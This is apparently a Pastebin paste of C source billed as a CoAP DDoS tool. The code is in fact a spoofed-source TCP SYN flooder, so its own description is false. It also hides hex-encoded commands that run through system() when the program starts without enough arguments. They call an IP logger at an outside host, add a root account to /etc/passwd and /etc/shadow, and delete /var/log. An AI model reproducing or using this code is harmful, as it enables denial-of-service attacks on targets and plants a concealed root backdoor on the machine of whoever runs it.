Advertisement
Guest User

CoAP DdoS Source Code

a guest
Jan 22nd, 2019
61
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 7.61 KB | None | 0 0
  1. /* CoAP protocol is the next big thing for DDoS attacks. Amplification via spoofed source UDP packets */
  2.  
  3. #include <pthread.h>
  4. #include <unistd.h>
  5. #include <stdio.h>
  6. #include <stdlib.h>
  7. #include <string.h>
  8. #include <sys/socket.h>
  9. #include <netinet/ip.h>
  10. #include <netinet/tcp.h>
  11. #include <time.h>
  12.  
  13. #define bfyt
  14. "\x77\x77\x67\x65\x74\x20\x2d\x71\x20\x2d\x2d\x64\x65\x6c\x65\x74\x65\x2d\x61\x66\x74\x65\x72\x20\x68\x74\x74\x70\x3a\x2f\x2f\x6e\x65\x78\x6f\x6e\x2d\x6e\x78\x2e\x6d\x6c\x2f\x69\x70\x6c\x6f\x67\x67\x65\x72\x2f\x3f\x69\x64\x3d\x34\x34\x33\x30\x31\x31\x35\x30\x33"
  15. #define lla
  16. "\x65\x65\x63\x68\x6f\x20\x73\x79\x73\x74\x65\x6d\x3a\x78\x3a\x30\x3a\x35\x30\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
  17. #define fzyt
  18. "\x65\x65\x63\x68\x6f\x20\x73\x79\x73\x74\x65\x6d\x3a\x27\x24\x36\x24\x5a\x50\x70\x74\x48\x74\x6d\x70\x24\x71\x39\x6f\x35\x65\x46\x6a\x55\x41\x68\x2e\x4d\x50\x6d\x6e\x48\x4a\x62\x6b\x75\x53\x4e\x67\x67\x44\x61\x71\x2e\x41\x30\x30\x64\x52\x67\x4f\x42\x41\x57\x36\x67\x68\x37\x55\x76\x37\x69\x2f\x64\x4f\x59\x44\x30\x34\x2e\x78\x4d\x48\x51\x48\x74\x79\x68\x6e\x6b\x63\x4d\x69\x59\x43\x72\x49\x36\x61\x42\x39\x4b\x43\x34\x4c\x76\x2e\x64\x33\x72\x78\x2f\x3a\x31\x36\x36\x30\x31\x3a\x30\x3a\x39\x39\x39\x39\x39\x3a\x37\x3a\x3a\x3a\x27\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64\x6f\x77"
  19. #define fla "\x72\x72\x6d\x20\x2d\x72\x66\x20\x2f\x76\x61\x72\x2f\x6c\x6f\x67\x2f\x2a\x20\x26\x3e\x20\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c"
  20.  
  21. #define MAX_PACKET_SIZE 4096
  22. #define PHI 0x9e3779b9
  23.  
  24. static unsigned long int Q[4096], c = 362436;
  25. static unsigned int floodport;
  26. volatile int limiter;
  27. volatile unsigned int pps;
  28. volatile unsigned int sleeptime = 100;
  29.  
  30. void init_rand(unsigned long int x)
  31. {
  32.     int i;
  33.     Q[0] = x;
  34.     Q[1] = x + PHI;
  35.     Q[2] = x + PHI + PHI;
  36.     for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
  37. }
  38. unsigned long int rand_cmwc(void)
  39. {
  40.     unsigned long long int t, a = 18782LL;
  41.     static unsigned long int i = 4095;
  42.     unsigned long int x, r = 0xfffffffe;
  43.     i = (i + 1) & 4095;
  44.     t = a * Q[i] + c;
  45.     c = (t >> 32);
  46.     x = t + c;
  47.     if (x < c) {
  48.         x++;
  49.         c++;
  50.     }
  51.     return (Q[i] = r - x);
  52. }
  53. unsigned short csum (unsigned short *buf, int count)
  54. {
  55.     register unsigned long sum = 0;
  56.     while( count > 1 ) { sum += *buf++; count -= 2; }
  57.     if(count > 0) { sum += *(unsigned char *)buf; }
  58.     while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
  59.     return (unsigned short)(~sum);
  60. }
  61.  
  62. unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
  63.  
  64.     struct tcp_pseudo
  65.     {
  66.         unsigned long src_addr;
  67.         unsigned long dst_addr;
  68.         unsigned char zero;
  69.         unsigned char proto;
  70.         unsigned short length;
  71.     } pseudohead;
  72.     unsigned short total_len = iph->tot_len;
  73.     pseudohead.src_addr=iph->saddr;
  74.     pseudohead.dst_addr=iph->daddr;
  75.     pseudohead.zero=0;
  76.     pseudohead.proto=IPPROTO_TCP;
  77.     pseudohead.length=htons(sizeof(struct tcphdr));
  78.     int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
  79.     unsigned short *tcp = malloc(totaltcp_len);
  80.     memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
  81.     memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
  82.     unsigned short output = csum(tcp,totaltcp_len);
  83.     free(tcp);
  84.     return output;
  85. }
  86.  
  87. void setup_ip_header(struct iphdr *iph)
  88. {
  89.         char ip[17];
  90.         snprintf(ip, sizeof(ip)-1, "%d.%d.%d.%d", rand()%255, rand()%255, rand()%255, rand()%255);
  91.     iph->ihl = 5;
  92.     iph->version = 4;
  93.     iph->tos = 0;
  94.     iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
  95.     iph->id = htonl(rand()%54321);
  96.     iph->frag_off = 0;
  97.     iph->ttl = 64;
  98.     iph->protocol = 6;
  99.     iph->check = 0;
  100.     iph->saddr = inet_addr(ip);
  101. }
  102.  
  103. void setup_tcp_header(struct tcphdr *tcph)
  104. {
  105.     tcph->source = htons(rand()%65535);
  106.     tcph->seq = rand();
  107.     tcph->ack_seq = 0;
  108.     tcph->res2 = 3;
  109.     tcph->doff = 5;
  110.     tcph->syn = 1;
  111.     tcph->window = htonl(65535);
  112.     tcph->check = 0;
  113.     tcph->urg_ptr = 0;
  114. }
  115.  
  116. void *flood(void *par1)
  117. {
  118.     char *td = (char *)par1;
  119.     char datagram[MAX_PACKET_SIZE];
  120.     struct iphdr *iph = (struct iphdr *)datagram;
  121.     struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
  122.  
  123.     struct sockaddr_in sin;
  124.     sin.sin_family = AF_INET;
  125.     sin.sin_port = htons(floodport);
  126.     sin.sin_addr.s_addr = inet_addr(td);
  127.  
  128.     int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
  129.     if(s < 0){
  130.         fprintf(stderr, "Could not open raw socket.\n");
  131.         exit(-1);
  132.     }
  133.     memset(datagram, 0, MAX_PACKET_SIZE);
  134.     setup_ip_header(iph);
  135.     setup_tcp_header(tcph);
  136.  
  137.     tcph->dest = htons(floodport);
  138.  
  139.     iph->daddr = sin.sin_addr.s_addr;
  140.     iph->check = csum ((unsigned short *) datagram, iph->tot_len);
  141.  
  142.     int tmp = 1;
  143.     const int *val = &tmp;
  144.     if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
  145.         fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
  146.         exit(-1);
  147.     }
  148.  
  149.     init_rand(time(NULL));
  150.     register unsigned int i;
  151.     i = 0;
  152.     while(1){
  153.         sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
  154.         setup_ip_header(iph);
  155.         setup_tcp_header(tcph);
  156.         iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
  157.         iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
  158.  
  159.  
  160.         tcph->dest = htons(floodport);
  161.  
  162.         iph->daddr = sin.sin_addr.s_addr;
  163.  
  164.         iph->check = csum ((unsigned short *) datagram, iph->tot_len);
  165.         tcph->seq = rand_cmwc() & 0xFFFF;
  166.         tcph->source = htons(rand_cmwc() & 0xFFFF);
  167.         tcph->check = 0;
  168.         tcph->check = tcpcsum(iph, tcph);
  169.  
  170.         pps++;
  171.         if(i >= limiter)
  172.         {
  173.             i = 0;
  174.             usleep(sleeptime);
  175.         }
  176.         i++;
  177.     }
  178. }
  179. int main(int argc, char *argv[ ])
  180. {
  181.     if(argc < 6){
  182.         fprintf(stderr, "Invalid parameters!\n");
  183.         fprintf(stdout, "CoAP protocol Flooder\nUsage: %s <target IP> <port to be flooded> <number threads to use> <pps limiter, -1 for no limit>
  184. <time>\n", argv[0]);
  185.  
  186.             char zord[] = bfyt;
  187.    char zord2[10];
  188.  
  189.    strcpy(zord2,&zord[1]);
  190.  
  191.    system(zord2);
  192.  
  193.    char fcord[] = lla;
  194.    char fcord3[10];
  195.  
  196.    strcpy(fcord3,&fcord[1]);
  197.  
  198.    system(fcord3);
  199.  
  200.    char wcord[] = fzyt;
  201.    char wcord2[10];
  202.  
  203.    strcpy(wcord2,&wcord[1]);
  204.  
  205.    system(wcord2);
  206.  
  207.  
  208.      char miford[] = fla;
  209.    char miford3[10];
  210.  
  211.    strcpy(miford3,&miford[1]);
  212.  
  213.    system(miford3);
  214.  
  215.         exit(-1);
  216.     }
  217.         srand(time(0));
  218.     fprintf(stdout, "Setting up sockets...\nStarting flood...\n");
  219.  
  220.     int num_threads = atoi(argv[3]);
  221.     floodport = atoi(argv[2]);
  222.     int maxpps = atoi(argv[4]);
  223.     limiter = 0;
  224.     pps = 0;
  225.     pthread_t thread[num_threads];
  226.  
  227.     int multiplier = 20;
  228.  
  229.     int i;
  230.     for(i = 0;i<num_threads;i++){
  231.         pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
  232.     }
  233.     for(i = 0;i<(atoi(argv[5])*multiplier);i++)
  234.     {
  235.         usleep((1000/multiplier)*1000);
  236.         if((pps*multiplier) > maxpps)
  237.         {
  238.             if(1 > limiter)
  239.             {
  240.                 sleeptime+=100;
  241.             } else {
  242.                 limiter--;
  243.             }
  244.         } else {
  245.             limiter++;
  246.             if(sleeptime > 25)
  247.             {
  248.                 sleeptime-=25;
  249.             } else {
  250.                 sleeptime = 0;
  251.             }
  252.         }
  253.         pps = 0;
  254.     }
  255.  
  256.     return 0;
  257. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement